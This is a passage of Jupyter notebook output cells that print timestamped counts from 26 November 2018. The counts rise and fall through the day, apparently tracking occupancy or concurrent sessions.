"['2018-11-26 10:12:45.331786', 3]\n",
"['2018-11-26 10:12:49.565044', 4]\n",
"['2018-11-26 10:12:50.782709', 5]\n",
"['2018-11-26 10:13:06.288459', 6]\n",
"['2018-11-26 10:13:07.499133', 7]\n",
"['2018-11-26 10:13:17.346646', 8]\n",
"['2018-11-26 10:13:29.891085', 9]\n",
"['2018-11-26 10:13:30.546280', 10]\n",
"['2018-11-26 10:13:33.031079', 11]\n",
"['2018-11-26 10:13:54.892843', 12]\n",
"['2018-11-26 10:14:11.977583', 13]\n",
"['2018-11-26 10:14:47.513066', 14]\n",
"['2018-11-26 10:14:57.318876', 15]\n",
"['2018-11-26 10:15:17.538032', 16]\n",
"['2018-11-26 10:18:06.722349', 13]\n",
"['2018-11-26 10:18:25.480679', 14]\n",
"['2018-11-26 10:19:15.353117', 12]\n",
"['2018-11-26 10:19:23.362516', 11]\n",
"['2018-11-26 10:19:48.352904', 10]\n",
"['2018-11-26 10:19:56.352856', 9]\n",
"['2018-11-26 10:20:01.848994', 7]\n",
"['2018-11-26 10:20:03.879084', 8]\n",
"['2018-11-26 10:20:08.289073', 6]\n",
"['2018-11-26 10:20:47.479099', 7]\n",
"['2018-11-26 10:20:55.092560', 8]\n",
"['2018-11-26 10:21:07.000348', 9]\n",
"['2018-11-26 10:21:15.568919', 10]\n",
"['2018-11-26 10:21:22.231829', 11]\n",
"['2018-11-26 10:21:49.987745', 12]\n",
"['2018-11-26 10:22:26.311989', 11]\n",
"['2018-11-26 10:22:29.496543', 12]\n",
"['2018-11-26 10:22:39.702394', 13]\n",
"['2018-11-26 10:22:42.562769', 14]\n",
"['2018-11-26 10:22:50.465847', 15]\n",
"['2018-11-26 10:23:25.846221', 16]\n",
"['2018-11-26 10:24:11.102175', 15]\n",
"['2018-11-26 10:25:18.177251', 14]\n",
"['2018-11-26 10:26:01.860991', 13]\n",
"['2018-11-26 10:26:15.033863', 14]\n",
"['2018-11-26 10:26:17.393769', 15]\n",
"['2018-11-26 10:26:20.862545', 13]\n",
"['2018-11-26 10:26:44.821416', 11]\n",
"['2018-11-26 10:27:34.986706', 12]\n",
"['2018-11-26 10:27:35.968331', 11]\n",
"['2018-11-26 10:27:44.829560', 10]\n",
"['2018-11-26 10:28:13.508227', 9]\n",
"['2018-11-26 10:29:15.075690', 8]\n",
"['2018-11-26 10:30:08.258572', 6]\n",
"['2018-11-26 10:30:54.511552', 7]\n",
"['2018-11-26 10:32:07.122324', 5]\n",
"['2018-11-26 10:34:08.262304', 4]\n",
"['2018-11-26 10:36:15.157545', 3]\n",
"['2018-11-26 10:38:38.886271', 4]\n",
"['2018-11-26 10:39:08.261661', 5]\n",
"['2018-11-26 10:41:15.213551', 6]\n",
"['2018-11-26 10:43:02.630072', 4]\n",
"['2018-11-26 10:47:56.939419', 5]\n",
"['2018-11-26 10:49:08.272769', 6]\n",
"['2018-11-26 10:50:54.513550', 5]\n",
"['2018-11-26 10:52:16.528924', 6]\n",
"['2018-11-26 10:53:37.062726', 5]\n",
"['2018-11-26 10:54:17.902878', 6]\n",
"['2018-11-26 10:54:49.044991', 7]\n",
"['2018-11-26 10:55:05.068283', 6]\n",
"['2018-11-26 10:55:08.338990', 7]\n",
"['2018-11-26 10:56:02.171102', 8]\n",
"['2018-11-26 10:56:10.786878', 7]\n",
"['2018-11-26 10:56:21.938085', 8]\n",
"['2018-11-26 10:56:33.025179', 9]\n",
"['2018-11-26 10:56:37.821779', 10]\n",
"['2018-11-26 10:56:55.088857', 9]\n",
"['2018-11-26 10:57:40.356173', 8]\n",
"['2018-11-26 10:57:53.887856', 9]\n",
"['2018-11-26 11:00:53.692169', 8]\n",
"['2018-11-26 11:01:08.477057', 9]\n",
"['2018-11-26 11:02:02.342492', 8]\n",
"['2018-11-26 11:04:20.296008', 4]\n",
"['2018-11-26 11:08:00.586142', 3]\n",
"['2018-11-26 11:08:21.122496', 2]\n",
"['2018-11-26 11:15:36.503505', 3]\n",
"['2018-11-26 11:18:03.507808', 4]\n",
"['2018-11-26 11:20:53.904654', 5]\n",
"['2018-11-26 11:22:01.866632', 6]\n",
"['2018-11-26 11:22:20.040779', 7]\n",
"['2018-11-26 11:22:25.636233', 8]\n",
"['2018-11-26 11:24:16.170824', 7]\n",
"['2018-11-26 11:24:30.050755', 8]\n",
"['2018-11-26 11:24:33.676719', 9]\n",
"['2018-11-26 11:26:18.072935', 10]\n",
"['2018-11-26 11:26:25.284587', 9]\n",
"['2018-11-26 11:27:19.098953', 10]\n",
"['2018-11-26 11:27:24.683060', 11]\n",
"['2018-11-26 11:27:29.683555', 12]\n",
"['2018-11-26 11:27:37.030775', 13]\n",
"['2018-11-26 11:27:44.693245', 12]\n",
"['2018-11-26 11:27:53.035815', 13]\n",
"['2018-11-26 11:27:53.158750', 14]\n",
"['2018-11-26 11:27:55.497968', 15]\n",
"['2018-11-26 11:28:10.965288', 16]\n",
"['2018-11-26 11:28:53.035314', 13]\n",
"['2018-11-26 11:29:29.784000', 14]\n",
"['2018-11-26 11:29:33.902061', 15]\n",
"['2018-11-26 11:29:58.003636', 16]\n",
"['2018-11-26 11:30:10.540006', 17]\n",
"['2018-11-26 11:30:38.167603', 18]\n",
"['2018-11-26 11:30:50.379625', 17]\n",
"['2018-11-26 11:30:54.421903', 16]\n",
"['2018-11-26 11:31:29.213525', 17]\n",
"['2018-11-26 11:31:29.732410', 18]\n",
"['2018-11-26 11:31:59.258853', 17]\n",
"['2018-11-26 11:32:11.744319', 16]\n",
"['2018-11-26 11:33:00.264982', 15]\n",
"['2018-11-26 11:33:07.677634', 16]\n",
"['2018-11-26 11:33:24.144315', 17]\n",
"['2018-11-26 11:33:34.437958', 16]\n",
"['2018-11-26 11:33:34.930020', 17]\n",
"['2018-11-26 11:33:42.771967', 18]\n",
"['2018-11-26 11:33:54.407867', 17]\n",
"['2018-11-26 11:33:57.385551', 18]\n",
"['2018-11-26 11:34:00.575817', 19]\n",
"['2018-11-26 11:34:12.206169', 17]\n",
"['2018-11-26 11:34:24.162864', 18]\n",
"['2018-11-26 11:34:30.662970', 19]\n",
"['2018-11-26 11:34:47.736712', 17]\n",
"['2018-11-26 11:35:25.033280', 16]\n",
"['2018-11-26 11:35:59.883428', 15]\n",
"['2018-11-26 11:36:25.100197', 14]\n",
"['2018-11-26 11:37:31.688696', 13]\n",
"['2018-11-26 11:37:39.535553', 12]\n",
"['2018-11-26 11:38:13.014054', 9]\n",
"['2018-11-26 11:38:41.229971', 6]\n",
"['2018-11-26 11:39:20.681193', 5]\n",
"['2018-11-26 11:42:31.993750', 4]\n",
"['2018-11-26 11:42:32.382528', 5]\n",
"['2018-11-26 11:44:34.299983', 4]\n",
"['2018-11-26 11:45:35.309938', 3]\n",
"['2018-11-26 11:46:36.863001', 2]\n",
"['2018-11-26 11:47:14.653059', 3]\n",
"['2018-11-26 11:55:07.211095', 2]\n",
"['2018-11-26 12:02:26.105530', 3]\n",
"['2018-11-26 12:04:33.540669', 4]\n",
"['2018-11-26 12:06:49.691762', 5]\n",
"['2018-11-26 12:06:51.685823', 6]\n",
"['2018-11-26 12:07:28.043449', 7]\n",
"['2018-11-26 12:09:02.329631', 6]\n",
"['2018-11-26 12:09:07.135688', 5]\n",
"['2018-11-26 12:09:38.477513', 4]\n",
"['2018-11-26 12:09:40.948871', 5]\n",
"['2018-11-26 12:11:02.497378', 6]\n",
"['2018-11-26 12:11:52.164750', 7]\n",
"['2018-11-26 12:12:08.156351', 8]\n",
"['2018-11-26 12:12:39.624204', 9]\n",
"['2018-11-26 12:13:02.810450', 10]\n",
"['2018-11-26 12:13:13.813485', 9]\n",
"['2018-11-26 12:13:17.235440', 10]\n",
"['2018-11-26 12:13:25.589057', 11]\n",
"['2018-11-26 12:13:29.455982', 12]\n",
"['2018-11-26 12:13:45.645774', 13]\n",
"['2018-11-26 12:13:46.064441', 14]\n",
"['2018-11-26 12:13:53.828381', 15]\n",
"['2018-11-26 12:14:20.967043', 16]\n",
"['2018-11-26 12:14:34.518365', 17]\n",
"['2018-11-26 12:14:50.430384', 18]\n",
"['2018-11-26 12:15:00.166613', 19]\n",
"['2018-11-26 12:15:01.408979', 20]\n",
"['2018-11-26 12:15:05.058024', 21]\n",
"['2018-11-26 12:15:05.246729', 22]\n",
"['2018-11-26 12:15:08.646412', 23]\n",
"['2018-11-26 12:15:28.447809', 22]\n",
"['2018-11-26 12:15:53.843531', 21]\n",
"['2018-11-26 12:16:07.269341', 22]\n",
"['2018-11-26 12:16:38.653993', 23]\n",
"['2018-11-26 12:16:40.147569', 24]\n",
"['2018-11-26 12:16:45.015366', 25]\n",
"['2018-11-26 12:17:02.907265', 24]\n",
"['2018-11-26 12:17:47.337500', 25]\n",
"['2018-11-26 12:18:06.799784', 26]\n",
"['2018-11-26 12:18:06.958626', 27]\n",
"['2018-11-26 12:18:16.788837', 28]\n",
"['2018-11-26 12:18:40.877540', 27]\n",
"['2018-11-26 12:19:04.584760', 26]\n",
"['2018-11-26 12:19:09.556636', 27]\n",
"['2018-11-26 12:19:37.118770', 26]\n",
"['2018-11-26 12:19:40.099989', 27]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 12:19:45.016475', 26]\n",
"['2018-11-26 12:19:49.998088', 24]\n",
"['2018-11-26 12:19:52.987585', 25]\n",
"['2018-11-26 12:20:02.805053', 24]\n",
"['2018-11-26 12:20:10.815833', 21]\n",
"['2018-11-26 12:20:34.285905', 22]\n",
"['2018-11-26 12:20:41.732595', 21]\n",
"['2018-11-26 12:20:52.986090', 19]\n",
"['2018-11-26 12:21:21.178948', 20]\n",
"['2018-11-26 12:21:36.893291', 19]\n",
"['2018-11-26 12:21:48.924893', 18]\n",
"['2018-11-26 12:21:49.756561', 17]\n",
"['2018-11-26 12:22:02.637027', 18]\n",
"['2018-11-26 12:22:03.751701', 19]\n",
"['2018-11-26 12:22:08.362065', 18]\n",
"['2018-11-26 12:23:48.113935', 16]\n",
"['2018-11-26 12:24:17.535692', 17]\n",
"['2018-11-26 12:25:05.944166', 16]\n",
"['2018-11-26 12:25:22.072401', 17]\n",
"['2018-11-26 12:25:24.097069', 16]\n",
"['2018-11-26 12:26:13.976852', 13]\n",
"['2018-11-26 12:26:29.566901', 12]\n",
"['2018-11-26 12:26:46.518797', 9]\n",
"['2018-11-26 12:27:15.154418', 7]\n",
"['2018-11-26 12:29:24.285495', 4]\n",
"['2018-11-26 12:30:57.172198', 5]\n",
"['2018-11-26 12:32:47.082910', 4]\n",
"['2018-11-26 12:33:32.669568', 5]\n",
"['2018-11-26 12:34:37.441676', 6]\n",
"['2018-11-26 12:35:08.537411', 5]\n",
"['2018-11-26 12:36:04.146998', 6]\n",
"['2018-11-26 12:39:04.716926', 5]\n",
"['2018-11-26 12:40:06.076031', 4]\n",
"['2018-11-26 12:43:13.556801', 5]\n",
"['2018-11-26 12:46:52.128575', 4]\n",
"['2018-11-26 12:49:40.360541', 5]\n",
"['2018-11-26 12:51:19.229362', 6]\n",
"['2018-11-26 12:51:38.254516', 7]\n",
"['2018-11-26 12:52:53.327497', 8]\n",
"['2018-11-26 12:53:00.271110', 9]\n",
"['2018-11-26 12:53:45.904261', 8]\n",
"['2018-11-26 12:54:34.785264', 7]\n",
"['2018-11-26 12:54:55.411402', 6]\n",
"['2018-11-26 12:55:41.011312', 7]\n",
"['2018-11-26 12:56:03.000930', 8]\n",
"['2018-11-26 12:56:14.894768', 9]\n",
"['2018-11-26 12:56:29.610531', 10]\n",
"['2018-11-26 12:57:26.334294', 9]\n",
"['2018-11-26 12:57:53.815032', 8]\n",
"['2018-11-26 12:58:54.373014', 9]\n",
"['2018-11-26 12:59:33.279243', 10]\n",
"['2018-11-26 12:59:47.646939', 9]\n",
"['2018-11-26 13:00:14.377110', 10]\n",
"['2018-11-26 13:00:17.325264', 9]\n",
"['2018-11-26 13:00:29.631283', 8]\n",
"['2018-11-26 13:00:49.922872', 9]\n",
"['2018-11-26 13:01:25.780108', 10]\n",
"['2018-11-26 13:01:37.179015', 11]\n",
"['2018-11-26 13:02:05.219158', 10]\n",
"['2018-11-26 13:02:55.934535', 9]\n",
"['2018-11-26 13:04:10.456174', 10]\n",
"['2018-11-26 13:05:40.822025', 9]\n",
"['2018-11-26 13:08:06.039803', 10]\n",
"['2018-11-26 13:08:11.371558', 9]\n",
"['2018-11-26 13:09:09.153190', 10]\n",
"['2018-11-26 13:09:16.747548', 11]\n",
"['2018-11-26 13:10:02.536193', 12]\n",
"['2018-11-26 13:12:45.216994', 13]\n",
"['2018-11-26 13:13:43.554988', 12]\n",
"['2018-11-26 13:14:01.616558', 13]\n",
"['2018-11-26 13:17:04.834604', 14]\n",
"['2018-11-26 13:17:08.404898', 13]\n",
"['2018-11-26 13:17:24.640893', 14]\n",
"['2018-11-26 13:17:46.768122', 15]\n",
"['2018-11-26 13:17:52.866292', 14]\n",
"['2018-11-26 13:17:59.350739', 15]\n",
"['2018-11-26 13:20:01.247633', 16]\n",
"['2018-11-26 13:21:13.790811', 15]\n",
"['2018-11-26 13:22:00.713612', 14]\n",
"['2018-11-26 13:22:06.351151', 15]\n",
"['2018-11-26 13:22:25.159664', 14]\n",
"['2018-11-26 13:22:43.865438', 15]\n",
"['2018-11-26 13:22:51.777326', 16]\n",
"['2018-11-26 13:23:33.165082', 17]\n",
"['2018-11-26 13:23:35.702462', 18]\n",
"['2018-11-26 13:23:54.765377', 19]\n",
"['2018-11-26 13:24:02.918572', 18]\n",
"['2018-11-26 13:25:02.843954', 19]\n",
"['2018-11-26 13:25:11.537199', 20]\n",
"['2018-11-26 13:25:34.782227', 19]\n",
"['2018-11-26 13:25:41.138893', 20]\n",
"['2018-11-26 13:26:01.659846', 21]\n",
"['2018-11-26 13:26:45.260854', 22]\n",
"['2018-11-26 13:26:48.062498', 23]\n",
"['2018-11-26 13:27:31.486133', 22]\n",
"['2018-11-26 13:27:53.732328', 23]\n",
"['2018-11-26 13:28:14.676232', 22]\n",
"['2018-11-26 13:28:33.870554', 21]\n",
"['2018-11-26 13:28:50.094856', 20]\n",
"['2018-11-26 13:28:51.385878', 21]\n",
"['2018-11-26 13:29:03.897207', 20]\n",
"['2018-11-26 13:29:10.920563', 19]\n",
"['2018-11-26 13:29:13.395327', 20]\n",
"['2018-11-26 13:29:44.364377', 19]\n",
"['2018-11-26 13:29:47.419614', 20]\n",
"['2018-11-26 13:30:01.428348', 21]\n",
"['2018-11-26 13:30:03.990979', 20]\n",
"['2018-11-26 13:30:28.282163', 21]\n",
"['2018-11-26 13:30:34.956711', 20]\n",
"['2018-11-26 13:30:39.959488', 19]\n",
"['2018-11-26 13:30:45.882342', 18]\n",
"['2018-11-26 13:30:58.851437', 17]\n",
"['2018-11-26 13:31:07.077851', 18]\n",
"['2018-11-26 13:31:09.689660', 19]\n",
"['2018-11-26 13:31:10.385377', 20]\n",
"['2018-11-26 13:31:24.264579', 21]\n",
"['2018-11-26 13:31:39.553294', 20]\n",
"['2018-11-26 13:31:51.392564', 19]\n",
"['2018-11-26 13:32:15.363934', 18]\n",
"['2018-11-26 13:32:59.883690', 19]\n",
"['2018-11-26 13:33:09.267432', 20]\n",
"['2018-11-26 13:33:14.943939', 21]\n",
"['2018-11-26 13:33:26.478445', 22]\n",
"['2018-11-26 13:33:41.085718', 23]\n",
"['2018-11-26 13:33:44.663543', 24]\n",
"['2018-11-26 13:33:53.643009', 23]\n",
"['2018-11-26 13:34:01.568586', 24]\n",
"['2018-11-26 13:34:06.029117', 23]\n",
"['2018-11-26 13:34:12.681457', 24]\n",
"['2018-11-26 13:34:25.351295', 25]\n",
"['2018-11-26 13:34:39.890329', 26]\n",
"['2018-11-26 13:34:48.034555', 27]\n",
"['2018-11-26 13:35:08.965913', 26]\n",
"['2018-11-26 13:35:12.476304', 25]\n",
"['2018-11-26 13:35:25.373806', 24]\n",
"['2018-11-26 13:35:42.030263', 25]\n",
"['2018-11-26 13:35:46.337623', 26]\n",
"['2018-11-26 13:35:58.474256', 27]\n",
"['2018-11-26 13:36:09.837873', 26]\n",
"['2018-11-26 13:36:15.355947', 27]\n",
"['2018-11-26 13:36:20.044643', 28]\n",
"['2018-11-26 13:36:20.872396', 29]\n",
"['2018-11-26 13:37:00.588187', 28]\n",
"['2018-11-26 13:37:09.820044', 27]\n",
"['2018-11-26 13:37:20.822079', 26]\n",
"['2018-11-26 13:38:02.481775', 25]\n",
"['2018-11-26 13:38:08.779473', 24]\n",
"['2018-11-26 13:38:20.240585', 23]\n",
"['2018-11-26 13:38:26.163856', 22]\n",
"['2018-11-26 13:39:24.792835', 21]\n",
"['2018-11-26 13:39:46.292344', 22]\n",
"['2018-11-26 13:39:47.226198', 23]\n",
"['2018-11-26 13:40:02.877605', 22]\n",
"['2018-11-26 13:40:15.375136', 21]\n",
"['2018-11-26 13:40:15.448258', 22]\n",
"['2018-11-26 13:40:26.848505', 23]\n",
"['2018-11-26 13:40:31.019510', 24]\n",
"['2018-11-26 13:40:35.418065', 25]\n",
"['2018-11-26 13:40:49.763085', 26]\n",
"['2018-11-26 13:40:52.681975', 25]\n",
"['2018-11-26 13:40:52.799802', 26]\n",
"['2018-11-26 13:41:07.513070', 27]\n",
"['2018-11-26 13:41:13.252882', 25]\n",
"['2018-11-26 13:41:20.404220', 26]\n",
"['2018-11-26 13:41:31.720879', 24]\n",
"['2018-11-26 13:41:38.021739', 25]\n",
"['2018-11-26 13:41:54.377608', 26]\n",
"['2018-11-26 13:42:01.343205', 27]\n",
"['2018-11-26 13:42:06.633468', 28]\n",
"['2018-11-26 13:42:14.065448', 29]\n",
"['2018-11-26 13:42:14.687784', 30]\n",
"['2018-11-26 13:42:18.897194', 31]\n",
"['2018-11-26 13:42:21.193917', 30]\n",
"['2018-11-26 13:42:31.333202', 31]\n",
"['2018-11-26 13:42:43.983583', 32]\n",
"['2018-11-26 13:43:13.222015', 31]\n",
"['2018-11-26 13:43:29.227724', 30]\n",
"['2018-11-26 13:43:50.701900', 31]\n",
"['2018-11-26 13:45:08.925182', 32]\n",
"['2018-11-26 13:45:13.962977', 31]\n",
"['2018-11-26 13:45:32.788767', 29]\n",
"['2018-11-26 13:45:51.215043', 28]\n",
"['2018-11-26 13:45:54.601767', 27]\n",
"['2018-11-26 13:45:59.736800', 25]\n",
"['2018-11-26 13:46:08.941078', 24]\n",
"['2018-11-26 13:46:21.560483', 20]\n",
"['2018-11-26 13:46:25.452554', 21]\n",
"['2018-11-26 13:46:38.539046', 20]\n",
"['2018-11-26 13:46:51.812729', 19]\n",
"['2018-11-26 13:46:59.432315', 18]\n",
"['2018-11-26 13:47:04.080250', 19]\n",
"['2018-11-26 13:47:10.223660', 20]\n",
"['2018-11-26 13:47:10.643909', 21]\n",
"['2018-11-26 13:47:28.697429', 22]\n",
"['2018-11-26 13:47:40.520425', 20]\n",
"['2018-11-26 13:49:55.395793', 21]\n",
"['2018-11-26 13:50:47.511756', 22]\n",
"['2018-11-26 13:51:01.408474', 21]\n",
"['2018-11-26 13:51:41.695494', 20]\n",
"['2018-11-26 13:51:44.579308', 19]\n",
"['2018-11-26 13:53:02.604233', 18]\n",
"['2018-11-26 13:53:46.890990', 19]\n",
"['2018-11-26 13:53:49.982169', 18]\n",
"['2018-11-26 13:53:57.415149', 16]\n",
"['2018-11-26 13:54:45.976018', 14]\n",
"['2018-11-26 13:54:50.378425', 13]\n",
"['2018-11-26 13:54:52.758607', 14]\n",
"['2018-11-26 13:55:43.769453', 13]\n",
"['2018-11-26 13:55:52.050944', 12]\n",
"['2018-11-26 13:55:54.412010', 13]\n",
"['2018-11-26 13:56:21.824637', 14]\n",
"['2018-11-26 13:56:43.605823', 15]\n",
"['2018-11-26 13:57:07.680085', 14]\n",
"['2018-11-26 13:57:21.822634', 13]\n",
"['2018-11-26 13:58:03.872693', 12]\n",
"['2018-11-26 13:58:55.350800', 11]\n",
"['2018-11-26 13:59:03.735352', 12]\n",
"['2018-11-26 13:59:47.939548', 13]\n",
"['2018-11-26 13:59:56.275642', 12]\n",
"['2018-11-26 14:00:56.105865', 11]\n",
"['2018-11-26 14:01:26.220433', 10]\n",
"['2018-11-26 14:03:04.456503', 8]\n",
"['2018-11-26 14:03:43.031303', 7]\n",
"['2018-11-26 14:04:21.158837', 6]\n",
"['2018-11-26 14:04:51.388965', 5]\n",
"['2018-11-26 14:10:26.799778', 2]\n",
"['2018-11-26 14:13:54.578671', 3]\n",
"['2018-11-26 14:18:11.058466', 2]\n",
"['2018-11-26 14:20:34.404811', 3]\n",
"['2018-11-26 14:20:45.505813', 4]\n",
"['2018-11-26 14:20:53.709517', 5]\n",
"['2018-11-26 14:20:55.226949', 6]\n",
"['2018-11-26 14:21:33.477326', 7]\n",
"['2018-11-26 14:24:30.359288', 8]\n",
"['2018-11-26 14:24:51.919108', 9]\n",
"['2018-11-26 14:25:08.076579', 8]\n",
"['2018-11-26 14:25:08.161087', 9]\n",
"['2018-11-26 14:25:09.132389', 10]\n",
"['2018-11-26 14:25:13.284533', 11]\n",
"['2018-11-26 14:25:16.564333', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 14:25:29.284706', 11]\n",
"['2018-11-26 14:27:02.282229', 10]\n",
"['2018-11-26 14:27:27.749028', 11]\n",
"['2018-11-26 14:27:31.476050', 12]\n",
"['2018-11-26 14:27:43.849065', 13]\n",
"['2018-11-26 14:27:59.762343', 14]\n",
"['2018-11-26 14:28:03.270492', 15]\n",
"['2018-11-26 14:28:13.056653', 16]\n",
"['2018-11-26 14:28:29.541778', 17]\n",
"['2018-11-26 14:28:31.928041', 16]\n",
"['2018-11-26 14:28:47.496913', 17]\n",
"['2018-11-26 14:28:51.612098', 18]\n",
"['2018-11-26 14:28:52.242279', 17]\n",
"['2018-11-26 14:30:17.623482', 14]\n",
"['2018-11-26 14:31:28.304302', 13]\n",
"['2018-11-26 14:31:54.700490', 12]\n",
"['2018-11-26 14:31:59.853918', 11]\n",
"['2018-11-26 14:32:23.032023', 10]\n",
"['2018-11-26 14:32:32.869482', 9]\n",
"['2018-11-26 14:32:55.216033', 7]\n",
"['2018-11-26 14:33:17.832135', 6]\n",
"['2018-11-26 14:33:47.896919', 7]\n",
"['2018-11-26 14:35:08.975934', 6]\n",
"['2018-11-26 14:35:11.907971', 7]\n",
"['2018-11-26 14:37:01.028265', 6]\n",
"['2018-11-26 14:37:14.225810', 7]\n",
"['2018-11-26 14:38:33.166583', 8]\n",
"['2018-11-26 14:38:40.118587', 9]\n",
"['2018-11-26 14:40:31.075040', 7]\n",
"['2018-11-26 14:40:59.316147', 8]\n",
"['2018-11-26 14:41:40.160653', 7]\n",
"['2018-11-26 14:41:45.075009', 8]\n",
"['2018-11-26 14:44:30.701044', 9]\n",
"['2018-11-26 14:45:01.871757', 8]\n",
"['2018-11-26 14:47:24.028140', 7]\n",
"['2018-11-26 14:52:18.219958', 5]\n",
"['2018-11-26 14:53:54.296959', 3]\n",
"['2018-11-26 14:54:16.341680', 4]\n",
"['2018-11-26 14:58:07.572456', 3]\n",
"['2018-11-26 15:01:39.197012', 4]\n",
"['2018-11-26 15:02:29.227277', 3]\n",
"['2018-11-26 15:03:59.757490', 4]\n",
"['2018-11-26 15:04:03.842588', 5]\n",
"['2018-11-26 15:04:37.611695', 6]\n",
"['2018-11-26 15:04:43.058351', 7]\n",
"['2018-11-26 15:04:55.412845', 8]\n",
"['2018-11-26 15:05:45.281827', 9]\n",
"['2018-11-26 15:05:57.633039', 10]\n",
"['2018-11-26 15:06:32.606295', 9]\n",
"['2018-11-26 15:08:44.918139', 8]\n",
"['2018-11-26 15:09:57.361913', 9]\n",
"['2018-11-26 15:12:49.763233', 10]\n",
"['2018-11-26 15:14:08.446406', 11]\n",
"['2018-11-26 15:15:49.662245', 10]\n",
"['2018-11-26 15:17:00.600476', 9]\n",
"['2018-11-26 15:17:57.011271', 8]\n",
"['2018-11-26 15:18:15.004382', 7]\n",
"['2018-11-26 15:20:58.461233', 8]\n",
"['2018-11-26 15:21:09.157046', 9]\n",
"['2018-11-26 15:22:08.424551', 10]\n",
"['2018-11-26 15:23:43.473123', 11]\n",
"['2018-11-26 15:24:22.356353', 12]\n",
"['2018-11-26 15:26:07.918938', 13]\n",
"['2018-11-26 15:26:08.965867', 14]\n",
"['2018-11-26 15:26:50.482971', 15]\n",
"['2018-11-26 15:27:15.067187', 16]\n",
"['2018-11-26 15:27:52.815428', 17]\n",
"['2018-11-26 15:28:25.070637', 18]\n",
"['2018-11-26 15:28:41.808674', 17]\n",
"['2018-11-26 15:29:04.744089', 15]\n",
"['2018-11-26 15:29:20.128422', 16]\n",
"['2018-11-26 15:29:22.646500', 17]\n",
"['2018-11-26 15:29:31.711803', 18]\n",
"['2018-11-26 15:30:09.599154', 17]\n",
"['2018-11-26 15:30:11.937041', 18]\n",
"['2018-11-26 15:31:11.403075', 17]\n",
"['2018-11-26 15:31:13.458042', 16]\n",
"['2018-11-26 15:31:54.203131', 15]\n",
"['2018-11-26 15:32:08.366922', 14]\n",
"['2018-11-26 15:32:12.462310', 13]\n",
"['2018-11-26 15:32:26.696978', 12]\n",
"['2018-11-26 15:33:21.543430', 13]\n",
"['2018-11-26 15:33:35.232639', 12]\n",
"['2018-11-26 15:33:49.538414', 13]\n",
"['2018-11-26 15:34:12.232167', 12]\n",
"['2018-11-26 15:34:28.243850', 10]\n",
"['2018-11-26 15:36:21.736869', 9]\n",
"['2018-11-26 15:36:26.196433', 10]\n",
"['2018-11-26 15:36:38.165308', 9]\n",
"['2018-11-26 15:37:10.357229', 8]\n",
"['2018-11-26 15:37:38.493160', 7]\n",
"['2018-11-26 15:38:06.534903', 6]\n",
"['2018-11-26 15:39:06.855997', 5]\n",
"['2018-11-26 15:40:11.810823', 6]\n",
"['2018-11-26 15:44:23.832139', 4]\n",
"['2018-11-26 15:44:42.776770', 3]\n",
"['2018-11-26 15:46:59.579490', 4]\n",
"['2018-11-26 15:47:25.897636', 5]\n",
"['2018-11-26 15:47:30.939009', 6]\n",
"['2018-11-26 15:52:30.361113', 3]\n",
"['2018-11-26 15:53:17.822518', 4]\n",
"['2018-11-26 15:53:34.139025', 5]\n",
"['2018-11-26 15:54:13.505418', 4]\n",
"['2018-11-26 15:55:41.341656', 5]\n",
"['2018-11-26 15:59:16.567657', 6]\n",
"['2018-11-26 15:59:53.356764', 5]\n",
"['2018-11-26 16:00:31.725066', 6]\n",
"['2018-11-26 16:01:24.674237', 5]\n",
"['2018-11-26 16:04:31.792921', 4]\n",
"['2018-11-26 16:07:36.496718', 5]\n",
"['2018-11-26 16:10:27.406635', 6]\n",
"['2018-11-26 16:12:14.421314', 7]\n",
"['2018-11-26 16:13:29.627287', 8]\n",
"['2018-11-26 16:13:37.463664', 9]\n",
"['2018-11-26 16:13:46.406379', 10]\n",
"['2018-11-26 16:13:55.865857', 11]\n",
"['2018-11-26 16:13:59.592935', 12]\n",
"['2018-11-26 16:14:01.346483', 13]\n",
"['2018-11-26 16:14:35.266238', 14]\n",
"['2018-11-26 16:14:55.213279', 15]\n",
"['2018-11-26 16:16:33.469059', 13]\n",
"['2018-11-26 16:19:03.753815', 12]\n",
"['2018-11-26 16:19:21.492118', 11]\n",
"['2018-11-26 16:19:34.095153', 10]\n",
"['2018-11-26 16:19:42.164959', 9]\n",
"['2018-11-26 16:19:47.526665', 10]\n",
"['2018-11-26 16:19:48.722168', 11]\n",
"['2018-11-26 16:19:50.704231', 12]\n",
"['2018-11-26 16:20:47.689732', 13]\n",
"['2018-11-26 16:21:15.446642', 14]\n",
"['2018-11-26 16:22:01.168121', 15]\n",
"['2018-11-26 16:22:41.193994', 14]\n",
"['2018-11-26 16:23:02.388888', 15]\n",
"['2018-11-26 16:23:14.392676', 16]\n",
"['2018-11-26 16:23:18.257289', 17]\n",
"['2018-11-26 16:23:55.617098', 15]\n",
"['2018-11-26 16:24:47.085168', 16]\n",
"['2018-11-26 16:25:28.791751', 14]\n",
"['2018-11-26 16:26:42.127459', 10]\n",
"['2018-11-26 16:26:43.407943', 11]\n",
"['2018-11-26 16:26:49.625171', 12]\n",
"['2018-11-26 16:27:43.892053', 9]\n",
"['2018-11-26 16:27:48.809960', 8]\n",
"['2018-11-26 16:28:12.345685', 7]\n",
"['2018-11-26 16:28:16.383506', 8]\n",
"['2018-11-26 16:28:49.683463', 6]\n",
"['2018-11-26 16:30:52.549569', 4]\n",
"['2018-11-26 16:31:02.789545', 5]\n",
"['2018-11-26 16:34:49.409435', 6]\n",
"['2018-11-26 16:38:31.014628', 7]\n",
"['2018-11-26 16:38:48.199843', 6]\n",
"['2018-11-26 16:39:25.937340', 5]\n",
"['2018-11-26 16:42:42.188853', 4]\n",
"['2018-11-26 16:43:12.539021', 3]\n",
"['2018-11-26 16:44:29.169589', 2]\n",
"['2018-11-26 16:52:51.899234', 3]\n",
"['2018-11-26 16:53:41.609540', 4]\n",
"['2018-11-26 16:54:02.457450', 5]\n",
"['2018-11-26 16:54:51.200468', 6]\n",
"['2018-11-26 16:59:27.730089', 7]\n",
"['2018-11-26 17:01:47.942657', 6]\n",
"['2018-11-26 17:02:32.644747', 5]\n",
"['2018-11-26 17:04:18.373823', 6]\n",
"['2018-11-26 17:06:45.567904', 7]\n",
"['2018-11-26 17:11:42.858253', 8]\n",
"['2018-11-26 17:12:22.057886', 9]\n",
"['2018-11-26 17:12:55.583157', 10]\n",
"['2018-11-26 17:13:09.448176', 9]\n",
"['2018-11-26 17:13:22.019145', 10]\n",
"['2018-11-26 17:15:40.012970', 11]\n",
"['2018-11-26 17:16:47.013245', 10]\n",
"['2018-11-26 17:17:02.978092', 9]\n",
"['2018-11-26 17:17:22.722535', 8]\n",
